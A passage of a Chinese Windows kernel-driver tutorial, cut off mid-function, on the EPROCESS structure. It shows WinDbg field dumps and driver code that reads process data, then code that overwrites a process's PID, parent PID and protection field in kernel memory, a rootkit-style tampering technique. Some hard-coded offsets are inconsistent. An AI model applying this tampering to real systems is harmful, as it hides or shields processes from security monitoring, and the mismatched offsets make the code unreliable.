windows驱动开发12.EProcess结构体与修改进程信息

查看eprocess结构体

Windows操作系统中的EPROCESS是一个关键的内核数据结构，它是Windows内核用来表示进程的执行体(Executive Process)。

EPROCESS是一个复杂的结构体，包含了与进程相关的所有信息，例如：

• 进程ID (PID)
• 父进程ID
• 进程创建时间
• 进程安全上下文
• 进程地址空间信息
• 进程拥有的对象句柄
• 线程列表
• 进程优先级
• 内存使用统计
• 各种标志和状态信息

1.windgb中查看eprocess

在 WinDbg 中，你可以使用多种命令来查看和分析 EPROCESS 结构体。以下是几种常用方法：

1. 使用 dt命令查看 EPROCESS 结构定义：

   dt nt!_EPROCESS

   这会显示整个 EPROCESS 结构的布局和成员。

2. 查看特定进程的 EPROCESS：

   !process [进程地址] 1

   或者通过 PID 查看：

   !process [PID] 1

3. 要获取当前进程的 EPROCESS 地址并查看：

   r $proc
   dt nt!_EPROCESS @$proc

4. 查看特定字段：

   dt nt!_EPROCESS [进程地址] [字段名]

   例如：

   dt nt!_EPROCESS @$proc ImageFileName

5. 使用

   !peb

   命令查看进程环境块信息：

   !peb [进程地址]

6. 查看进程列表并获取 EPROCESS 地址：

   !process 0 0

7. 使用 WinDbg 中的 “Debugger Markup Language” (DML) 功能：

   !dlls -p [PID]

如果想探索完整的 EPROCESS 结构，可以结合使用这些命令进行导航和分析。记住，EPROCESS 结构在不同 Windows 版本中可能会有变化，所以具体字段可能会因操作系统版本而异。

2. windows_23h2查看结果如下

0: kd> dt nt!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x438 ProcessLock      : _EX_PUSH_LOCK
   +0x440 UniqueProcessId  : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   +0x458 RundownProtect   : _EX_RUNDOWN_REF
   +0x460 Flags2           : Uint4B
   +0x460 JobNotReallyActive : Pos 0, 1 Bit
   +0x460 AccountingFolded : Pos 1, 1 Bit
   +0x460 NewProcessReported : Pos 2, 1 Bit
   +0x460 ExitProcessReported : Pos 3, 1 Bit
   +0x460 ReportCommitChanges : Pos 4, 1 Bit
   +0x460 LastReportMemory : Pos 5, 1 Bit
   +0x460 ForceWakeCharge  : Pos 6, 1 Bit
   +0x460 CrossSessionCreate : Pos 7, 1 Bit
   +0x460 NeedsHandleRundown : Pos 8, 1 Bit
   +0x460 RefTraceEnabled  : Pos 9, 1 Bit
   +0x460 PicoCreated      : Pos 10, 1 Bit
   +0x460 EmptyJobEvaluated : Pos 11, 1 Bit
   +0x460 DefaultPagePriority : Pos 12, 3 Bits
   +0x460 PrimaryTokenFrozen : Pos 15, 1 Bit
   +0x460 ProcessVerifierTarget : Pos 16, 1 Bit
   +0x460 RestrictSetThreadContext : Pos 17, 1 Bit
   +0x460 AffinityPermanent : Pos 18, 1 Bit
   +0x460 AffinityUpdateEnable : Pos 19, 1 Bit
   +0x460 PropagateNode    : Pos 20, 1 Bit
   +0x460 ExplicitAffinity : Pos 21, 1 Bit
   +0x460 ProcessExecutionState : Pos 22, 2 Bits
   +0x460 EnableReadVmLogging : Pos 24, 1 Bit
   +0x460 EnableWriteVmLogging : Pos 25, 1 Bit
   +0x460 FatalAccessTerminationRequested : Pos 26, 1 Bit
   +0x460 DisableSystemAllowedCpuSet : Pos 27, 1 Bit
   +0x460 ProcessStateChangeRequest : Pos 28, 2 Bits
   +0x460 ProcessStateChangeInProgress : Pos 30, 1 Bit
   +0x460 InPrivate        : Pos 31, 1 Bit
   +0x464 Flags            : Uint4B
   +0x464 CreateReported   : Pos 0, 1 Bit
   +0x464 NoDebugInherit   : Pos 1, 1 Bit
   +0x464 ProcessExiting   : Pos 2, 1 Bit
   +0x464 ProcessDelete    : Pos 3, 1 Bit
   +0x464 ManageExecutableMemoryWrites : Pos 4, 1 Bit
   +0x464 VmDeleted        : Pos 5, 1 Bit
   +0x464 OutswapEnabled   : Pos 6, 1 Bit
   +0x464 Outswapped       : Pos 7, 1 Bit
   +0x464 FailFastOnCommitFail : Pos 8, 1 Bit
   +0x464 Wow64VaSpace4Gb  : Pos 9, 1 Bit
   +0x464 AddressSpaceInitialized : Pos 10, 2 Bits
   +0x464 SetTimerResolution : Pos 12, 1 Bit
   +0x464 BreakOnTermination : Pos 13, 1 Bit
   +0x464 DeprioritizeViews : Pos 14, 1 Bit
   +0x464 WriteWatch       : Pos 15, 1 Bit
   +0x464 ProcessInSession : Pos 16, 1 Bit
   +0x464 OverrideAddressSpace : Pos 17, 1 Bit
   +0x464 HasAddressSpace  : Pos 18, 1 Bit
   +0x464 LaunchPrefetched : Pos 19, 1 Bit
   +0x464 Reserved         : Pos 20, 1 Bit
   +0x464 VmTopDown        : Pos 21, 1 Bit
   +0x464 ImageNotifyDone  : Pos 22, 1 Bit
   +0x464 PdeUpdateNeeded  : Pos 23, 1 Bit
   +0x464 VdmAllowed       : Pos 24, 1 Bit
   +0x464 ProcessRundown   : Pos 25, 1 Bit
   +0x464 ProcessInserted  : Pos 26, 1 Bit
   +0x464 DefaultIoPriority : Pos 27, 3 Bits
   +0x464 ProcessSelfDelete : Pos 30, 1 Bit
   +0x464 SetTimerResolutionLink : Pos 31, 1 Bit
   +0x468 CreateTime       : _LARGE_INTEGER
   +0x470 ProcessQuotaUsage : [2] Uint8B
   +0x480 ProcessQuotaPeak : [2] Uint8B
   +0x490 PeakVirtualSize  : Uint8B
   +0x498 VirtualSize      : Uint8B
   +0x4a0 SessionProcessLinks : _LIST_ENTRY
   +0x4b0 ExceptionPortData : Ptr64 Void
   +0x4b0 ExceptionPortValue : Uint8B
   +0x4b0 ExceptionPortState : Pos 0, 3 Bits
   +0x4b8 Token            : _EX_FAST_REF
   +0x4c0 MmReserved       : Uint8B
   +0x4c8 AddressCreationLock : _EX_PUSH_LOCK
   +0x4d0 PageTableCommitmentLock : _EX_PUSH_LOCK
   +0x4d8 RotateInProgress : Ptr64 _ETHREAD
   +0x4e0 ForkInProgress   : Ptr64 _ETHREAD
   +0x4e8 CommitChargeJob  : Ptr64 _EJOB
   +0x4f0 CloneRoot        : _RTL_AVL_TREE
   +0x4f8 NumberOfPrivatePages : Uint8B
   +0x500 NumberOfLockedPages : Uint8B
   +0x508 Win32Process     : Ptr64 Void
   +0x510 Job              : Ptr64 _EJOB
   +0x518 SectionObject    : Ptr64 Void
   +0x520 SectionBaseAddress : Ptr64 Void
   +0x528 Cookie           : Uint4B
   +0x530 WorkingSetWatch  : Ptr64 _PAGEFAULT_HISTORY
   +0x538 Win32WindowStation : Ptr64 Void
   +0x540 InheritedFromUniqueProcessId : Ptr64 Void
   +0x548 OwnerProcessId   : Uint8B
   +0x550 Peb              : Ptr64 _PEB
   +0x558 Session          : Ptr64 _MM_SESSION_SPACE
   +0x560 Spare1           : Ptr64 Void
   +0x568 QuotaBlock       : Ptr64 _EPROCESS_QUOTA_BLOCK
   +0x570 ObjectTable      : Ptr64 _HANDLE_TABLE
   +0x578 DebugPort        : Ptr64 Void
   +0x580 WoW64Process     : Ptr64 _EWOW64PROCESS
   +0x588 DeviceMap        : _EX_FAST_REF
   +0x590 EtwDataSource    : Ptr64 Void
   +0x598 PageDirectoryPte : Uint8B
   +0x5a0 ImageFilePointer : Ptr64 _FILE_OBJECT
   +0x5a8 ImageFileName    : [15] UChar
   +0x5b7 PriorityClass    : UChar
   +0x5b8 SecurityPort     : Ptr64 Void
   +0x5c0 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO
   +0x5c8 JobLinks         : _LIST_ENTRY
   +0x5d8 HighestUserAddress : Ptr64 Void
   +0x5e0 ThreadListHead   : _LIST_ENTRY
   +0x5f0 ActiveThreads    : Uint4B
   +0x5f4 ImagePathHash    : Uint4B
   +0x5f8 DefaultHardErrorProcessing : Uint4B
   +0x5fc LastThreadExitStatus : Int4B
   +0x600 PrefetchTrace    : _EX_FAST_REF
   +0x608 LockedPagesList  : Ptr64 Void
   +0x610 ReadOperationCount : _LARGE_INTEGER
   +0x618 WriteOperationCount : _LARGE_INTEGER
   +0x620 OtherOperationCount : _LARGE_INTEGER
   +0x628 ReadTransferCount : _LARGE_INTEGER
   +0x630 WriteTransferCount : _LARGE_INTEGER
   +0x638 OtherTransferCount : _LARGE_INTEGER
   +0x640 CommitChargeLimit : Uint8B
   +0x648 CommitCharge     : Uint8B
   +0x650 CommitChargePeak : Uint8B
   +0x680 Vm               : _MMSUPPORT_FULL
   +0x7c0 MmProcessLinks   : _LIST_ENTRY
   +0x7d0 ModifiedPageCount : Uint4B
   +0x7d4 ExitStatus       : Int4B
   +0x7d8 VadRoot          : _RTL_AVL_TREE
   +0x7e0 VadHint          : Ptr64 Void
   +0x7e8 VadCount         : Uint8B
   +0x7f0 VadPhysicalPages : Uint8B
   +0x7f8 VadPhysicalPagesLimit : Uint8B
   +0x800 AlpcContext      : _ALPC_PROCESS_CONTEXT
   +0x820 TimerResolutionLink : _LIST_ENTRY
   +0x830 TimerResolutionStackRecord : Ptr64 _PO_DIAG_STACK_RECORD
   +0x838 RequestedTimerResolution : Uint4B
   +0x83c SmallestTimerResolution : Uint4B
   +0x840 ExitTime         : _LARGE_INTEGER
   +0x848 InvertedFunctionTable : Ptr64 _INVERTED_FUNCTION_TABLE_KERNEL_MODE
   +0x850 InvertedFunctionTableLock : _EX_PUSH_LOCK
   +0x858 ActiveThreadsHighWatermark : Uint4B
   +0x85c LargePrivateVadCount : Uint4B
   +0x860 ThreadListLock   : _EX_PUSH_LOCK
   +0x868 WnfContext       : Ptr64 Void
   +0x870 ServerSilo       : Ptr64 _EJOB
   +0x878 SignatureLevel   : UChar
   +0x879 SectionSignatureLevel : UChar
   +0x87a Protection       : _PS_PROTECTION
   +0x87b HangCount        : Pos 0, 3 Bits
   +0x87b GhostCount       : Pos 3, 3 Bits
   +0x87b PrefilterException : Pos 6, 1 Bit
   +0x87c Flags3           : Uint4B
   +0x87c Minimal          : Pos 0, 1 Bit
   +0x87c ReplacingPageRoot : Pos 1, 1 Bit
   +0x87c Crashed          : Pos 2, 1 Bit
   +0x87c JobVadsAreTracked : Pos 3, 1 Bit
   +0x87c VadTrackingDisabled : Pos 4, 1 Bit
   +0x87c AuxiliaryProcess : Pos 5, 1 Bit
   +0x87c SubsystemProcess : Pos 6, 1 Bit
   +0x87c IndirectCpuSets  : Pos 7, 1 Bit
   +0x87c RelinquishedCommit : Pos 8, 1 Bit
   +0x87c HighGraphicsPriority : Pos 9, 1 Bit
   +0x87c CommitFailLogged : Pos 10, 1 Bit
   +0x87c ReserveFailLogged : Pos 11, 1 Bit
   +0x87c SystemProcess    : Pos 12, 1 Bit
   +0x87c HideImageBaseAddresses : Pos 13, 1 Bit
   +0x87c AddressPolicyFrozen : Pos 14, 1 Bit
   +0x87c ProcessFirstResume : Pos 15, 1 Bit
   +0x87c ForegroundExternal : Pos 16, 1 Bit
   +0x87c ForegroundSystem : Pos 17, 1 Bit
   +0x87c HighMemoryPriority : Pos 18, 1 Bit
   +0x87c EnableProcessSuspendResumeLogging : Pos 19, 1 Bit
   +0x87c EnableThreadSuspendResumeLogging : Pos 20, 1 Bit
   +0x87c SecurityDomainChanged : Pos 21, 1 Bit
   +0x87c SecurityFreezeComplete : Pos 22, 1 Bit
   +0x87c VmProcessorHost  : Pos 23, 1 Bit
   +0x87c VmProcessorHostTransition : Pos 24, 1 Bit
   +0x87c AltSyscall       : Pos 25, 1 Bit
   +0x87c TimerResolutionIgnore : Pos 26, 1 Bit
   +0x87c DisallowUserTerminate : Pos 27, 1 Bit
   +0x87c EnableProcessRemoteExecProtectVmLogging : Pos 28, 1 Bit
   +0x87c EnableProcessLocalExecProtectVmLogging : Pos 29, 1 Bit
   +0x87c MemoryCompressionProcess : Pos 30, 1 Bit
   +0x880 DeviceAsid       : Int4B
   +0x888 SvmData          : Ptr64 Void
   +0x890 SvmProcessLock   : _EX_PUSH_LOCK
   +0x898 SvmLock          : Uint8B
   +0x8a0 SvmProcessDeviceListHead : _LIST_ENTRY
   +0x8b0 LastFreezeInterruptTime : Uint8B
   +0x8b8 DiskCounters     : Ptr64 _PROCESS_DISK_COUNTERS
   +0x8c0 PicoContext      : Ptr64 Void
   +0x8c8 EnclaveTable     : Ptr64 Void
   +0x8d0 EnclaveNumber    : Uint8B
   +0x8d8 EnclaveLock      : _EX_PUSH_LOCK
   +0x8e0 HighPriorityFaultsAllowed : Uint4B
   +0x8e8 EnergyContext    : Ptr64 _PO_PROCESS_ENERGY_CONTEXT
   +0x8f0 VmContext        : Ptr64 Void
   +0x8f8 SequenceNumber   : Uint8B
   +0x900 CreateInterruptTime : Uint8B
   +0x908 CreateUnbiasedInterruptTime : Uint8B
   +0x910 TotalUnbiasedFrozenTime : Uint8B
   +0x918 LastAppStateUpdateTime : Uint8B
   +0x920 LastAppStateUptime : Pos 0, 61 Bits
   +0x920 LastAppState     : Pos 61, 3 Bits
   +0x928 SharedCommitCharge : Uint8B
   +0x930 SharedCommitLock : _EX_PUSH_LOCK
   +0x938 SharedCommitLinks : _LIST_ENTRY
   +0x948 AllowedCpuSets   : Uint8B
   +0x950 DefaultCpuSets   : Uint8B
   +0x948 AllowedCpuSetsIndirect : Ptr64 Uint8B
   +0x950 DefaultCpuSetsIndirect : Ptr64 Uint8B
   +0x958 DiskIoAttribution : Ptr64 Void
   +0x960 DxgProcess       : Ptr64 Void
   +0x968 Win32KFilterSet  : Uint4B
   +0x96c Machine          : Uint2B
   +0x96e Spare0           : Uint2B
   +0x970 ProcessTimerDelay : _PS_INTERLOCKED_TIMER_DELAY_VALUES
   +0x978 KTimerSets       : Uint4B
   +0x97c KTimer2Sets      : Uint4B
   +0x980 ThreadTimerSets  : Uint4B
   +0x988 VirtualTimerListLock : Uint8B
   +0x990 VirtualTimerListHead : _LIST_ENTRY
   +0x9a0 WakeChannel      : _WNF_STATE_NAME
   +0x9a0 WakeInfo         : _PS_PROCESS_WAKE_INFORMATION
   +0x9d0 MitigationFlags  : Uint4B
   +0x9d0 MitigationFlagsValues : <unnamed-tag>
   +0x9d4 MitigationFlags2 : Uint4B
   +0x9d4 MitigationFlags2Values : <unnamed-tag>
   +0x9d8 PartitionObject  : Ptr64 Void
   +0x9e0 SecurityDomain   : Uint8B
   +0x9e8 ParentSecurityDomain : Uint8B
   +0x9f0 CoverageSamplerContext : Ptr64 Void
   +0x9f8 MmHotPatchContext : Ptr64 Void
   +0xa00 IdealProcessorAssignmentBlock : _KE_IDEAL_PROCESSOR_ASSIGNMENT_BLOCK
   +0xb18 DynamicEHContinuationTargetsTree : _RTL_AVL_TREE
   +0xb20 DynamicEHContinuationTargetsLock : _EX_PUSH_LOCK
   +0xb28 DynamicEnforcedCetCompatibleRanges : _PS_DYNAMIC_ENFORCED_ADDRESS_RANGES
   +0xb38 DisabledComponentFlags : Uint4B
   +0xb3c PageCombineSequence : Int4B
   +0xb40 EnableOptionalXStateFeaturesLock : _EX_PUSH_LOCK
   +0xb48 PathRedirectionHashes : Ptr64 Uint4B
   +0xb50 SyscallProvider  : Ptr64 _PS_SYSCALL_PROVIDER
   +0xb58 SyscallProviderProcessLinks : _LIST_ENTRY
   +0xb68 SyscallProviderDispatchContext : _PSP_SYSCALL_PROVIDER_DISPATCH_CONTEXT
   +0xb70 MitigationFlags3 : Uint4B
   +0xb70 MitigationFlags3Values : <unnamed-tag>

3. 在驱动程序中使用Windows提供的公开函数访问eprocess结构体的信息

#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__);

// 添加必要的声明
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemProcessInformation = 5
    // 其他值省略
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER Reserved[3];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    HANDLE InheritedFromUniqueProcessId;
    ULONG HandleCount;
    ULONG SessionId;
    ULONG_PTR PageDirectoryBase;
    // 其他字段省略
} SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;

// 声明需要使用的函数
NTSTATUS NTAPI ZwQuerySystemInformation(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
);

// 仅在较新的Windows版本中可用的函数
#if (NTDDI_VERSION >= NTDDI_VISTA)
HANDLE PsGetProcessInheritedFromUniqueProcessId(PEPROCESS Process);
#endif

ULONG PsGetProcessSessionId(PEPROCESS Process);
PPEB PsGetProcessPeb(PEPROCESS Process);
PUCHAR PsGetProcessImageFileName(PEPROCESS Process);

// 函数声明
VOID GetProcessInfo(HANDLE ProcessId);
VOID EnumerateProcesses();
NTSTATUS GetProcessNameByPid(HANDLE ProcessId, PUCHAR ProcessName, SIZE_T ProcessNameSize);

// 驱动卸载函数
NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
    return STATUS_SUCCESS;
}

// 驱动入口函数
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // 获取当前进程的EPROCESS信息
    DebugMessage("qi:Getting current process info...");
    PEPROCESS CurrentProcess = PsGetCurrentProcess();
    HANDLE CurrentPid = PsGetProcessId(CurrentProcess);
    GetProcessInfo(CurrentPid);

    // 枚举所有进程 - 可能需要特权
    DebugMessage("qi:Enumerating all processes...");
    EnumerateProcesses();

    // 查找特定进程 (以System进程为例，PID通常为4)
    DebugMessage("qi:Looking up System process...");
    GetProcessInfo((HANDLE)4);

    return STATUS_SUCCESS;
}

// 获取进程信息函数
VOID GetProcessInfo(HANDLE ProcessId)
{
    PEPROCESS ProcessObj;
    NTSTATUS status;
    UCHAR ProcessName[16] = { 0 }; // EPROCESS中的ImageFileName最大为15字符+结束符

    // 通过PID查找进程对象
    status = PsLookupProcessByProcessId(ProcessId, &ProcessObj);
    if (!NT_SUCCESS(status)) {
        DebugMessage("qi:Failed to find process with PID %d, status: 0x%X", ProcessId, status);
        return;
    }

    // 获取进程名
    status = GetProcessNameByPid(ProcessId, ProcessName, sizeof(ProcessName));
    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Process Name: %s", ProcessName);
    }

    // 获取进程ID
    DebugMessage("qi:Process ID: %d", HandleToULong(PsGetProcessId(ProcessObj)));

    // 获取父进程ID (如果系统支持)
#if (NTDDI_VERSION >= NTDDI_VISTA)
    HANDLE ParentPid = PsGetProcessInheritedFromUniqueProcessId(ProcessObj);
    if (ParentPid) {
        DebugMessage("qi:Parent Process ID: %d", HandleToULong(ParentPid));
    }
#endif

    // 获取进程会话ID
    DebugMessage("qi:Process Session ID: %d", PsGetProcessSessionId(ProcessObj));

    // 获取进程PEB地址 (仅用户模式进程有效)
    PPEB Peb = PsGetProcessPeb(ProcessObj);
    if (Peb) {
        DebugMessage("qi:Process PEB Address: 0x%p", Peb);
    }
    else {
        DebugMessage("qi:Process has no PEB (likely kernel mode)");
    }

    // 在完成后释放对象引用
    ObDereferenceObject(ProcessObj);
}

// 获取进程名称函数
NTSTATUS GetProcessNameByPid(HANDLE ProcessId, PUCHAR ProcessName, SIZE_T ProcessNameSize)
{
    PEPROCESS ProcessObj;
    NTSTATUS status;

    status = PsLookupProcessByProcessId(ProcessId, &ProcessObj);
    if (!NT_SUCCESS(status)) {
        return status;
    }

    // 获取进程名
    PUCHAR ImageFileName = PsGetProcessImageFileName(ProcessObj);
    if (ImageFileName) {
        RtlStringCbCopyA((PCHAR)ProcessName, ProcessNameSize, (PCHAR)ImageFileName);
    }
    else {
        RtlZeroMemory(ProcessName, ProcessNameSize);
        RtlStringCbCopyA((PCHAR)ProcessName, ProcessNameSize, "Unknown");
    }

    ObDereferenceObject(ProcessObj);
    return STATUS_SUCCESS;
}

// 枚举所有进程函数 - 可能需要特权
VOID EnumerateProcesses()
{
    ULONG BufferSize = 0;
    PVOID Buffer = NULL;
    NTSTATUS status;
    PSYSTEM_PROCESS_INFORMATION ProcessInfo = NULL;
    PSYSTEM_PROCESS_INFORMATION CurrentProcess = NULL;

    // 首先获取所需的缓冲区大小
    status = ZwQuerySystemInformation(SystemProcessInformation, NULL, 0, &BufferSize);
    if (status != STATUS_INFO_LENGTH_MISMATCH) {
        DebugMessage("qi:Failed to query process information size: 0x%X", status);
        return;
    }

    // 分配内存
    Buffer = ExAllocatePoolWithTag(NonPagedPool, BufferSize, 'CORP');
    if (!Buffer) {
        DebugMessage("qi:Failed to allocate memory for process information");
        return;
    }

    // 获取进程信息
    status = ZwQuerySystemInformation(SystemProcessInformation, Buffer, BufferSize, NULL);
    if (!NT_SUCCESS(status)) {
        DebugMessage("qi:Failed to query process information: 0x%X", status);
        ExFreePoolWithTag(Buffer, 'CORP');
        return;
    }

    // 遍历进程
    CurrentProcess = (PSYSTEM_PROCESS_INFORMATION)Buffer;
    while (TRUE) {
        // 获取EPROCESS并打印信息
        if (CurrentProcess->UniqueProcessId != NULL) {
            GetProcessInfo(CurrentProcess->UniqueProcessId);
        }

        // 移至下一个进程
        if (CurrentProcess->NextEntryOffset == 0) {
            break;
        }

        CurrentProcess = (PSYSTEM_PROCESS_INFORMATION)(
            (PUCHAR)CurrentProcess + CurrentProcess->NextEntryOffset
            );
    }

    // 释放内存
    ExFreePoolWithTag(Buffer, 'CORP');
}

4. 在驱动程序中使用偏移量访问eprocess结构体的信息

#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__);

// EPROCESS结构体偏移量定义
// 注意：这些偏移量特定于Windows版本，需要根据系统版本调整
// 下面是Windows 10 20H2 x64的示例偏移量
#define EPROCESS_PID_OFFSET           0x440  // PID偏移量
#define EPROCESS_PPID_OFFSET          0x448  // 父进程PID偏移量
#define EPROCESS_IMAGE_NAME_OFFSET    0x5a8  // 进程名称偏移量
#define EPROCESS_CREATE_TIME_OFFSET   0x478  // 创建时间偏移量
#define EPROCESS_EXIT_STATUS_OFFSET   0x784  // 退出状态偏移量
#define EPROCESS_SESSION_ID_OFFSET    0x510  // 会话ID偏移量

// 驱动卸载函数
NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
    return STATUS_SUCCESS;
}

// 通过偏移量获取EPROCESS结构体信息的函数 - 改进版本
VOID DumpEprocessByOffset(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // 获取进程ID - 十进制和十六进制同时显示
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID (Offset: 0x%X): %d (0x%X)",
        EPROCESS_PID_OFFSET,
        HandleToULong(processId),
        HandleToULong(processId));

    // 获取父进程ID - 十进制和十六进制同时显示
    HANDLE parentProcessId = *(PHANDLE)(processBase + EPROCESS_PPID_OFFSET);
    DebugMessage("qi:Parent Process ID (Offset: 0x%X): %d (0x%X)",
        EPROCESS_PPID_OFFSET,
        HandleToULong(parentProcessId),
        HandleToULong(parentProcessId));

    // 获取进程名称 (ImageFileName 是一个固定大小的UCHAR数组，最多15个字符)
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name (Offset: 0x%X): %s", EPROCESS_IMAGE_NAME_OFFSET, imageName);

    // 获取进程创建时间
    LARGE_INTEGER createTime = *(PLARGE_INTEGER)(processBase + EPROCESS_CREATE_TIME_OFFSET);
    DebugMessage("qi:Process Create Time (Offset: 0x%X): 0x%llX", EPROCESS_CREATE_TIME_OFFSET, createTime.QuadPart);

    // 获取会话ID - 十进制和十六进制同时显示
    ULONG sessionId = *(PULONG)(processBase + EPROCESS_SESSION_ID_OFFSET);
    DebugMessage("qi:Session ID (Offset: 0x%X): %d (0x%X)",
        EPROCESS_SESSION_ID_OFFSET,
        sessionId,
        sessionId);

    // 获取进程退出状态(如果进程已退出)
    NTSTATUS exitStatus = *(PNTSTATUS)(processBase + EPROCESS_EXIT_STATUS_OFFSET);
    DebugMessage("qi:Exit Status (Offset: 0x%X): 0x%X", EPROCESS_EXIT_STATUS_OFFSET, exitStatus);

    // 直接打印EPROCESS地址
    DebugMessage("qi:EPROCESS Address: 0x%p", Process);

    // 打印偏移量处的原始内存内容，帮助调试
    DebugMessage("qi:Memory dump at Parent PID offset (0x%X):", EPROCESS_PPID_OFFSET);
    for (int i = 0; i < 8; i++) {
        DebugMessage("qi:  Byte %d: 0x%02X", i, processBase[EPROCESS_PPID_OFFSET + i]);
    }

    DebugMessage("qi:Memory dump at Session ID offset (0x%X):", EPROCESS_SESSION_ID_OFFSET);
    for (int i = 0; i < 4; i++) {
        DebugMessage("qi:  Byte %d: 0x%02X", i, processBase[EPROCESS_SESSION_ID_OFFSET + i]);
    }
}

// 查找指定PID的进程并使用偏移量打印其EPROCESS信息
VOID AccessProcessByPid(HANDLE ProcessId)
{
    PEPROCESS processObject;
    NTSTATUS status;

    status = PsLookupProcessByProcessId(ProcessId, &processObject);
    if (NT_SUCCESS(status))
    {
        DebugMessage("qi:Found process with PID %d (0x%X)",
            HandleToULong(ProcessId),
            HandleToULong(ProcessId));
        DumpEprocessByOffset(processObject);
        ObDereferenceObject(processObject);
    }
    else
    {
        DebugMessage("qi:Failed to find process with PID %d (0x%X), status: 0x%X",
            HandleToULong(ProcessId),
            HandleToULong(ProcessId),
            status);
    }
}

// 打印当前进程的EPROCESS信息
VOID AccessCurrentProcess()
{
    PEPROCESS currentProcess = PsGetCurrentProcess();
    DebugMessage("qi:Current Process EPROCESS Information:");
    DumpEprocessByOffset(currentProcess);
}

// 驱动入口函数
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // 打印警告信息
    DebugMessage("qi:WARNING: This driver uses hard-coded EPROCESS offsets that are specific to Windows version");
    DebugMessage("qi:Current offsets are for Windows 10 20H2 x64. Adjust offsets for your specific Windows version");

    // 打印当前进程的EPROCESS信息
    AccessCurrentProcess();

    // 打印System进程(PID通常为4)的EPROCESS信息
    AccessProcessByPid((HANDLE)4);

    // 尝试获取一些常见进程的信息
    AccessProcessByPid((HANDLE)0);  // Idle进程 (PID 0)

    // 尝试查找一些其他进程
    ULONG testPids[] = { 100, 1500, 2000, 2500, 5000 }; // 随机测试一些可能存在的PID
    for (int i = 0; i < sizeof(testPids) / sizeof(ULONG); i++) 
    {
        AccessProcessByPid((HANDLE)(ULONG_PTR)testPids[i]);
    }

    return STATUS_SUCCESS;
}

修改进程信息

1.修改进程pid与父进程pid为随机值

#include <ntifs.h>


VOID SetProcessInfoamtion(HANDLE Pid)
{
	// char buf[] = "Taskmgr.exe";
	if (Pid != 0)
	{
		PEPROCESS pe = NULL;
		NTSTATUS status = 0;
		status = PsLookupProcessByProcessId(Pid, &pe);
		if (NT_SUCCESS(status))
		{
			DbgPrintEx(0, 0, "R0:pe:%p\n", pe);
			ULONG a = rand() % 2996 +2048;
			*(PHANDLE)((ULONG64)pe + 0x440) = (HANDLE)a;
			*(PULONG)((ULONG64)pe + 0x87a) = 0xc0000051;
			//   +0x540 InheritedFromUniqueProcessId : Ptr64 Void
			*(PHANDLE)((ULONG64)pe + 0x540) = (HANDLE)a;
		}
	}
}

static VOID UnDriver(PDRIVER_OBJECT pDriverObj)
{
	DbgPrint("[-] 驱动卸载 \n");
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver, PUNICODE_STRING RegistryPath)
{
	DbgPrint("Hello  \n");

	SetProcessInfoamtion(0xCC);
	Driver->DriverUnload = UnDriver;
	return STATUS_SUCCESS;
}

2.修改进程id为固定值

#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__);

// EPROCESS结构体偏移量定义
#define EPROCESS_PID_OFFSET           0x440  // UniqueProcessId字段偏移量
#define EPROCESS_IMAGE_NAME_OFFSET    0x5a8  // ImageFileName字段偏移量
#define EPROCESS_PROTECTION_OFFSET    0x87A  // Protection字段偏移量 - 用于进程保护设置
#define EPROCESS_FLAGS_OFFSET         0x440  // Flags字段偏移量 - 具体偏移需要确认
#define PID_OLD 10660
#define PID_NEW 10524
// 驱动卸载函数
NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
    return STATUS_SUCCESS;
}

// 打印进程的关键信息
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // 获取进程ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // 获取进程名称
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);
}

// 尝试修改进程的保护标志
NTSTATUS ModifyProcessProtection(PEPROCESS Process, UCHAR NewProtectionValue)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // 记录原始值
        UCHAR oldValue = *(PUCHAR)(processBase + EPROCESS_PROTECTION_OFFSET);
